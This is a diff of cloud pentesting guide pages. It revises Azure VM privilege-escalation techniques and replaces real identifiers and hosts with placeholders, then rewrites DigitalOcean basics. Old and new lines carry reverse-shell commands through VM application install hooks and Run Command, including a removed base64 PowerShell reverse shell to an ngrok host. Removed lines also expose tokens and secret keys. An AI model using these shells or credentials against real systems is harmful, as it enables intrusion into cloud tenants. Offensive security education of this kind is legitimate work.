-   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
+   --package-file-link "https://<storage-account>.blob.core.windows.net/<container>/<package>?<sas-token>" \
    --install-command "powershell.exe -EncodedCommand $encodedCommand" \
-   --remove-command "powershell.exe -EncodedCommand $encodedCommand" \
-   --update-command "powershell.exe -EncodedCommand $encodedCommand"
+   --remove-command "cmd /c exit 0" \
+   --update-command "cmd /c exit 0"
 
 # Install the app in a VM to execute the rev shell
 ## Use the ID given in the previous output
 az vm application set \
    --resource-group <rsc-group> \
-   --name deleteme-win4 \
-   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
+   --name <vm-name> \
+   --app-version-ids /subscriptions/<subscription-id>/resourceGroups/<rsc-group>/providers/Microsoft.Compute/galleries/<gallery-name>/applications/myReverseShellAppWin/versions/1.0.0 \
    --treat-deployment-as-failure true
 
 # You can create a SAS URL from a blob with something like:
-export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export EXPIRY=$(date -u -d '+1 day' '+%Y-%m-%dT%H:%MZ' 2>/dev/null || date -u -v+1d '+%Y-%m-%dT%H:%MZ')
 export URL_PACKAGE=$(az storage blob generate-sas \
   --account-name <acc-name> \
   --container-name <container-name> \
@@ -398,7 +386,7 @@ export URL_PACKAGE=$(az storage blob generate-sas \
 
 {{#tab name="Az" }}
 
-```bash
+```powershell
 ##### GET VM #####
 
 Get-AzVm
@@ -463,7 +451,7 @@ New-AzGalleryApplication `
 
 # Create app version
 $versionName = "1.0.2"
-## create ngrok listener
+## Start the authorized listener before installing the application.
 
 New-AzGalleryApplicationVersion `
   -ResourceGroupName $rg `
@@ -472,9 +460,9 @@ New-AzGalleryApplicationVersion `
   -Name $versionName `
   -Location $location `
   -PackageFileLink "$sasToken" `
-  -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
-  -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
-  -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"
+  -Install "bash -c 'bash -i >& /dev/tcp/<attacker-host>/<port> 0>&1'" `
+  -Remove "true" `
+  -Update "true"
 
 
 # Launch app
@@ -490,7 +478,7 @@ Update-AzVM -ResourceGroupName $rg -VM $vm
 
 ### `Microsoft.Compute/virtualMachines/runCommand/action`
 
-This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:**
+Azure Run Command uses the VM agent to run scripts inside a VM, and invoking it requires `Microsoft.Compute/virtualMachines/runCommand/action`.<sup>[[13]](#references)[[14]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Linux" }}
@@ -504,7 +492,7 @@ az vm run-command invoke \
   --scripts @revshell.sh
 
 # revshell.sh file content
-echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
+echo "bash -c 'bash -i >& /dev/tcp/<attacker-host>/<port> 0>&1'" > revshell.sh
 ```
 
 {{#endtab }}
@@ -512,28 +500,12 @@ echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
 {{#tab name="Windows" }}
 
 ```bash
-# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
-# Execute a rev shell
+# revshell.ps1 contains the authorized PowerShell payload.
 az vm run-command invoke \
-  --resource-group Research \
-  --name juastavm \
+  --resource-group <resource-group> \
+  --name <vm-name> \
   --command-id RunPowerShellScript \
   --scripts @revshell.ps1
-
-## Get encoded reverse shell
-echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
-
-## Create app version with the rev shell
-## In Package file link just add any link to a blobl storage file
-export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
-
-# The content of
-echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
-
-
-# Try to run in every machine
-Import-module MicroBurst.psm1
-Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 ```
 
 {{#endtab }}
@@ -541,30 +513,30 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 
 ### `Microsoft.Compute/virtualMachines/login/action`
 
-This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
+This permission allows a principal to **log in as a regular user** when Microsoft Entra authentication is enabled on the VM.<sup>[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
-Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
+Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** or via **RDP** with Microsoft Entra credentials.<sup>[[15]](#references)[[16]](#references)</sup>
 
 ### `Microsoft.Compute/virtualMachines/loginAsAdmin/action`
 
-This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
+This permission allows a principal to **log in with Windows administrator or Linux sudo/administrator privileges** when Microsoft Entra authentication is enabled on the VM.<sup>[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
-Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
+Use the same Microsoft Entra-authenticated SSH or RDP workflows described above.<sup>[[15]](#references)[[16]](#references)</sup>
 
-### `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+### `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write`, `Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
-All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it.
+These permissions can be combined to **create a VM with a specific user-assigned managed identity** and leave a **port open** (22 in this case). The attacker can then connect to the VM and request tokens for that identity.<sup>[[11]](#references)[[17]](#references)</sup>
 
 Depending on the situation more or less permissions might be needed to abuse this technique.
 
 ```bash
 az vm create \
-  --resource-group Resource_Group_1 \
-  --name cli_vm \
+  --resource-group <resource-group> \
+  --name <vm-name> \
   --image Ubuntu2204 \
   --admin-username azureuser \
   --generate-ssh-keys \
-  --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \
+  --assign-identity /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity-name> \
   --nsg-rule ssh \
   --location "centralus"
 # By default pub key from ~/.ssh is used (if none, it's generated there)
@@ -572,8 +544,7 @@ az vm create \
 
 ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
-Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\
-Then, from the metadata service it's possible to generate tokens for each one.
+Those permissions are enough to **assign new managed identities to a VM**. A VM can have a **system-assigned identity** and multiple **user-assigned identities**. From inside the VM, IMDS can issue tokens for the assigned identities.<sup>[[11]](#references)[[17]](#references)</sup>
 
 ```bash
 # Get currently assigned managed identities to the VM
@@ -586,8 +557,8 @@ az vm identity assign \
   --resource-group <rsc-group> \
   --name <vm-name> \
   --identities \
-    /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
-    /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
+    /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity-name-1> \
+    /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity-name-2>
 ```
 
 Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
@@ -596,9 +567,9 @@ Then the attacker needs to have **compromised somehow the VM** to steal tokens f
 https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm
 {{#endref}}
 
-### Microsoft.Compute/virtualMachines/read, Microsoft.Compute/virtualMachines/write, Microsoft.Compute/virtualMachines/extensions/read, Microsoft.Compute/virtualMachines/extensions/write
+### Microsoft.Compute/virtualMachines/read, Microsoft.Compute/virtualMachines/write, Microsoft.Compute/virtualMachines/extensions/read, Microsoft.Compute/virtualMachines/extensions/write
 
-These permissions allow to change the virtual machine user and password to access it:
+These permissions allow the VMAccess extension to update a VM user password (or an SSH key on Linux).<sup>[[18]](#references)</sup>
 
 ```bash
 az vm user update \
@@ -608,16 +579,11 @@ az vm user update \
   --password <NEW_PASSWORD>
 ```
 
-### Microsoft.Compute/virtualMachines/write, "Microsoft.Compute/virtualMachines/read", "Microsoft.Compute/disks/read", "Microsoft.Network/networkInterfaces/read", "Microsoft.Network/networkInterfaces/join/action", "Microsoft.Compute/disks/write".
+### `Microsoft.Compute/virtualMachines/read`, `Microsoft.Compute/virtualMachines/write`, `Microsoft.Compute/disks/read`, `Microsoft.Compute/disks/write`
 
-These permissions allow you to manage, disks, and network interfaces, and, they enable you to attach a disk to a virtual machine.
+These permissions allow a disk to be inspected and attached to a virtual machine. Network-interface permissions are not required for this disk-attachment operation.<sup>[[14]](#references)[[19]](#references)</sup>
+
 ```bash
-# Update the disk's network access policy
-az disk update \
-  --name <disk-name> \
-  --resource-group <resource-group-name> \
-  --network-access-policy AllowAll
-
 # Attach the disk to a virtual machine
 az vm disk attach \
   --vm-name <vm-name> \
@@ -627,17 +593,29 @@ az vm disk attach \
 
 ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
 
-According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
+Microsoft documents this permission as allowing the resource's OS to be managed through Windows Admin Center as an administrator.<sup>[[14]](#references)</sup>
 
 ## References
 
-- [Azure VM Command Execution Using Third-Party Extensions – Salt Minion](https://netspi.com/blog/technical-blog/cloud-pentesting/azure-vm-command-execution-using-third-party-extensions-part-2)
-- [Install Salt Minion on Linux or Windows VMs using the VM Extension](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/salt-minion)
-- [Azure Instance Metadata Service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
-- [NetSPI - Azure VM Command Execution using Third-Party Extensions – Chef](https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-vm-command-execution-using-third-party-extensions/)
-- [Microsoft Learn - Chef extension for Azure VMs](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/chef)
-- [Microsoft Learn - Virtual machine extensions and features for Windows](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/features-windows)
-- [Chef Zero](https://github.com/chef/chef-zero)
-- [Microsoft Learn - Azure Instance Metadata Service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+- [1] [Azure VM extensions and features for Windows](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/features-windows)
+- [2] [Run Custom Script Extension on Linux VMs in Azure](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/custom-script-linux)
+- [3] [Azure Custom Script Extension for Windows](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/custom-script-windows)
+- [4] [VMAccess Extension for Windows](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/vmaccess-windows)
+- [5] [Introduction to the Azure Desired State Configuration extension handler](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/dsc-overview)
+- [6] [Salt Minion for Linux or Windows Azure VMs](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/salt-minion)
+- [7] [Azure VM Command Execution using Third-Party Extensions - Salt Minion](https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-vm-command-execution-using-third-party-extensions-part-2/)
+- [8] [Chef extension for Azure VMs](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/chef)
+- [9] [Chef Zero](https://github.com/chef/chef-zero)
+- [10] [Azure VM Command Execution using Third-Party Extensions - Chef](https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-vm-command-execution-using-third-party-extensions/)
+- [11] [Azure Instance Metadata Service for virtual machines](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service)
+- [12] [Create and deploy VM Application on Azure](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to)
+- [13] [Run scripts in your Windows VM by using action Run Commands](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/run-command)
+- [14] [Azure permissions for Compute](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute)
+- [15] [Sign in to a Linux virtual machine in Azure by using Microsoft Entra ID and OpenSSH](https://learn.microsoft.com/en-us/entra/identity/devices/howto-vm-sign-in-azure-ad-linux)
+- [16] [Sign in to a Windows virtual machine in Azure by using Microsoft Entra ID](https://learn.microsoft.com/en-us/entra/identity/devices/howto-vm-sign-in-azure-ad-windows)
+- [17] [Configure managed identities on Azure virtual machines](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-configure-managed-identities)
+- [18] [az vm user](https://learn.microsoft.com/en-us/cli/azure/vm/user?view=azure-cli-latest)
+- [19] [Use a Linux troubleshooting VM with the Azure CLI](https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/linux/troubleshoot-recovery-disks-linux)
+- [20] [Deploy an extension-based Windows or Linux User Hybrid Runbook Worker in Azure Automation](https://learn.microsoft.com/en-us/azure/automation/extension-based-hybrid-runbook-worker-install)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/digital-ocean-pentesting/README.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/README.md
@@ -1,10 +1,8 @@
 # Digital Ocean Pentesting
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**Before pentesting** a DigitalOcean environment, there are a few **basic concepts you need to know** about how DigitalOcean works. These concepts help you understand what to enumerate, how to find misconfigurations, and how they might be exploited.
 
 Concepts such as hierarchy, access and other basic concepts are explained in:
 
@@ -22,13 +20,15 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
 
 ### Projects
 
-To get a list of the projects and resources running on each of them from the CLI check:
+To get a list of the projects and the resources assigned to each of them from the CLI, see:
 
 {{#ref}}
 do-services/do-projects.md
 {{#endref}}
 
 ### Whoami
+
+The following command retrieves profile details for the authenticated account, including its email address, team, UUID, status, email-verification status, and Droplet limit.<sup>[[1]](#references)</sup>
 
 ```bash
 doctl account get
@@ -40,7 +40,10 @@ doctl account get
 do-services/
 {{#endref}}
 
-{{#include ../../banners/hacktricks-training.md}}
+## References
 
+- [1] [doctl account get | DigitalOcean Documentation](https://docs.digitalocean.com/reference/doctl/reference/account/get/)
+
+{{#include ../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-basic-information.md
@@ -1,138 +1,148 @@
 # DO - Basic Information
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean is a **cloud computing platform that provides users with a variety of services**, including virtual private servers (VPS) and other resources for building, deploying, and managing applications. **DigitalOcean's services are designed to be simple and easy to use**, making them **popular among developers and small businesses**.
+DigitalOcean is a cloud computing platform for building, deploying, and managing applications. Its product catalog includes virtual machines, managed containers, a PaaS, serverless functions, managed databases, and several storage and networking services.<sup>[[1]](#references)</sup>
 
-Some of the key features of DigitalOcean include:
+Some of the key DigitalOcean services and features are:<sup>[[1]](#references)</sup>
 
-- **Virtual private servers (VPS)**: DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
-- **Storage**: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
-- **Development and deployment tools**: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
-- **Security**: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
-
-Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
+- **Virtual private servers (VPS)**: Droplets are Linux-based virtual machines which can be created from distribution, application, or custom images.<sup>[[1]](#references)[[14]](#references)</sup>
+- **Storage and data services**: Spaces provides S3-compatible object storage, Volumes provides block storage, and Managed Databases provides hosted database clusters.
+- **Development and deployment tools**: App Platform, Kubernetes, Functions, APIs, SDKs, and the `doctl` CLI support application deployment and resource management.
+- **Security and networking controls**: The platform includes VPC networking, Cloud Firewalls, DDoS protection, backups, snapshots, monitoring, and other product-specific controls.
 
 ### Main Differences from AWS
 
-One of the main differences between DigitalOcean and AWS is the **range of services they offer**. **DigitalOcean focuses on providing simple** and easy-to-use virtual private servers (VPS), storage, and development and deployment tools. **AWS**, on the other hand, offers a **much broader range of services**, including VPS, storage, databases, machine learning, analytics, and many other services. This means that AWS is more suitable for complex, enterprise-level applications, while DigitalOcean is more suited to small businesses and developers.
+DigitalOcean's catalog is concentrated around developer-oriented compute, storage, database, networking, and application-platform services. AWS describes a broader global cloud product portfolio. This difference can make DigitalOcean easier to survey, while AWS may offer more specialized choices for a complex architecture.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Another key difference between the two platforms is the **pricing structure**. **DigitalOcean's pricing is generally more straightforward and easier** to understand than AWS, with a range of pricing plans that are based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure that is based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
+Pricing comparisons are workload-dependent. DigitalOcean commonly presents resources as plans, while AWS pricing may combine multiple resource dimensions; compare the current calculators and include networking, storage, backups, support, and managed-service costs before selecting a provider.
 
 ## Hierarchy
 
 ### User
 
-A user is what you expect, a user. He can **create Teams** and **be a member of different teams.**
+A personal account can belong to multiple teams and can create teams. The account also owns the user's name, sign-in method, and email preferences.<sup>[[3]](#references)</sup>
 
-### **Team**
+### Team
 
-A team is a group of **users**. When a user creates a team he has the **role owner on that team** and he initially **sets up the billing info**. **Other** user can then be **invited** to the team.
+A team contains users, infrastructure, and billing information. A new account begins as the sole member of its default team; team owners can invite other people, and a user can create or join multiple teams. Each team has separate billing information unless it belongs to an organization.<sup>[[3]](#references)</sup>
 
-Inside the team there might be several **projects**. A project is just a **set of services running**. It can be used to **separate different infra stages**, like prod, staging, dev...
+A team can contain several projects. Projects are useful for grouping resources by application, environment, or client, for example production, staging, and development.<sup>[[4]](#references)</sup>
 
 ### Project
 
-As explained, a project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
-A Digital Ocean project is very similar to a GCP project without IAM.
+A project is a container used to organize resources such as Droplets, Spaces buckets, databases, and Kubernetes clusters. Resources begin in a default project and can be moved into additional projects.<sup>[[4]](#references)</sup>
+
+Projects are organizational groupings, not separate accounts or teams. Access is controlled through the member's team role and its permissions, including permissions for project operations and the underlying resource types.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ## Permissions
 
 ### Team
 
-Basically all members of a team have **access to the DO resources in all the projects created within the team (with more or less privileges).**
+Team members' access to shared resources, billing information, and team settings is determined by their role. A personal access token cannot exceed the permissions available to the role of the person who generated it.<sup>[[5]](#references)</sup>
 
 ### Roles
 
-Each **user inside a team** can have **one** of the following three **roles** inside of it:
+DigitalOcean provides six predefined team roles:<sup>[[5]](#references)</sup>
 
-| Role       | Shared Resources | Billing Information | Team Settings |
-| ---------- | ---------------- | ------------------- | ------------- |
-| **Owner**  | Full access      | Full access         | Full access   |
-| **Biller** | No access        | Full access         | No access     |
-| **Member** | Full access      | No access           | No access     |
+| Role | Shared Resources | Billing Information | Team Settings |
+| --- | --- | --- | --- |
+| **Owner** | Full access | Full access | Full access |
+| **Biller** | No access | Full access | No access |
+| **Billing Viewer** | No access | Limited read only | No access |
+| **Member** | Full access | No access | Read only |
+| **Modifier** | Full access except delete | No access | Read only |
+| **Resource Viewer** | Read only | No access | Read only |
 
-**Owner** and **member can list the users** and check their **roles** (biller cannot).
+Teams can also define custom roles containing selected permissions for more granular access. DigitalOcean automatically updates predefined-role permissions as products evolve, but it does not automatically add new permissions to existing custom roles.<sup>[[6]](#references)</sup>
+
+Everyone on a team can view the membership table, including current roles and invitation status. Owners can additionally view each member's sign-in method and can invite, remove, or change the role of members.<sup>[[7]](#references)</sup>
 
 ## Access
 
 ### Username + password (MFA)
 
-As in most of the platforms, in order to access to the GUI you can use a set of **valid username and password** to **access** the cloud **resources**. Once logged in you can see **all the teams you are part** of in [https://cloud.digitalocean.com/account/profile](https://cloud.digitalocean.com/account/profile).\
-And you can see all your activity in [https://cloud.digitalocean.com/account/activity](https://cloud.digitalocean.com/account/activity).
+Users can access the control panel with valid credentials. Once logged in, personal and team information is available from [the account page](https://cloud.digitalocean.com/account/profile), and account activity is available from [the Activity tab](https://cloud.digitalocean.com/account/activity).
 
-**MFA** can be **enabled** in a user and **enforced** for all the users in a **team** to access the team.
+Users who sign in with a DigitalOcean username and password can enable two-factor authentication (2FA). A team owner can also require secure sign-in, which permits access only through Google, GitHub, or a DigitalOcean account with 2FA.<sup>[[8]](#references)</sup>
 
 ### API keys
 
-In order to use the API, users can **generate API keys**. These will always come with Read permissions but **Write permission are optional**.\
-The API keys look like this:
+Users can generate personal access tokens (PATs) for the DigitalOcean API. A token can use custom scopes, the read-only `api:read` alias, or the full-access `api:write` alias, but the available permissions remain bounded by the user's team role. Treat these tokens like passwords and store them in a secrets manager or environment variable when possible.<sup>[[9]](#references)</sup>
+
+An illustrative redacted token looks like:
 
 ```
-dop_v1_1946a92309d6240274519275875bb3cb03c1695f60d47eaa1532916502361836
+dop_v1_<redacted-token-value>
 ```
 
-The cli tool is [**doctl**](https://github.com/digitalocean/doctl#installing-doctl). Initialise it (you need a token) with:
+The official CLI is **`doctl`**. Initialize it with a token and list authentication contexts with:<sup>[[10]](#references)</sup>
 
 ```bash
 doctl auth init # Asks for the token
-doctl auth init --context my-context # Login with a different token
-doctl auth list # List accounts
+doctl auth init --context my-context # Add a named authentication context
+doctl auth list # List authentication contexts
 ```
 
-By default this token will be written in clear-text in Mac in `/Users/<username>/Library/Application Support/doctl/config.yaml`.
+`doctl` stores the API access token in its configuration file. On macOS, the default path is `/Users/<username>/Library/Application Support/doctl/config.yaml`; on Linux it is `${XDG_CONFIG_HOME}/doctl/config.yaml` or `~/.config/doctl/config.yaml`; on Windows it is `%APPDATA%\doctl\config.yaml`.<sup>[[10]](#references)</sup>
 
 ### Spaces access keys
 
-These are keys that give **access to the Spaces** (like S3 in AWS or Storage in GCP).
+Spaces access keys authenticate people or applications to the S3-compatible Spaces API and do not grant access to the control panel or unrelated resources. Each key has a name, an access key ID, and a secret key. Keys can have full access to all buckets or limited permissions for selected buckets; the secret is displayed only once when the key is created.<sup>[[11]](#references)</sup>
 
-They are composed by a **name**, a **keyid** and a **secret**. An example could be:
+An illustrative redacted key is:
 
 ```
 Name: key-example
-Keyid: DO00ZW4FABSGZHAABGFX
-Secret: 2JJ0CcQZ56qeFzAJ5GFUeeR4Dckarsh6EQSLm87MKlM
+Access key ID: DO00EXAMPLE0000000000
+Secret key: <redacted-secret-key>
 ```
 
 ### OAuth Application
 
-OAuth applications can be granted **access over Digital Ocean**.
-
-It's possible to **create OAuth applications** in [https://cloud.digitalocean.com/account/api/applications](https://cloud.digitalocean.com/account/api/applications) and check all **allowed OAuth applications** in [https://cloud.digitalocean.com/account/api/access](https://cloud.digitalocean.com/account/api/access).
+OAuth applications can obtain delegated, limited access to DigitalOcean teams. Registering an application creates a client ID and client secret; DigitalOcean supports authorization-code and implicit flows and accepts an optional scope parameter during authorization. Applications can be registered from [the OAuth Applications page](https://cloud.digitalocean.com/account/api/applications), and authorized applications can be reviewed from [the API access page](https://cloud.digitalocean.com/account/api/access).<sup>[[12]](#references)</sup>
 
 ### SSH Keys
 
-It's possible to add **SSH keys to a Digital Ocean Team** from the **console** in [https://cloud.digitalocean.com/account/security](https://cloud.digitalocean.com/account/security).
-
-This way, if you create a **new droplet, the SSH key will be set** on it and you will be able to **login via SSH** without password (note that newly [uploaded SSH keys aren't set in already existent droplets for security reasons](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/to-existing-droplet/)).
+Public SSH keys can be added to a DigitalOcean team from the control panel's [Security settings](https://cloud.digitalocean.com/account/security) and selected when creating a Droplet. This configures key-based SSH login on the new Droplet. Adding or deleting a team key does not modify existing Droplets; update an existing Droplet's `~/.ssh/authorized_keys` through the command line or recovery console instead.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ### Functions Authentication Token
 
-The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
+DigitalOcean Functions now uses user-specific namespace access keys for authenticated REST API access. The access key ID is the HTTP Basic username and the secret key is the password. Legacy shared namespace credentials stopped authenticating after 3 June 2026.<sup>[[15]](#references)</sup>
 
 ```bash
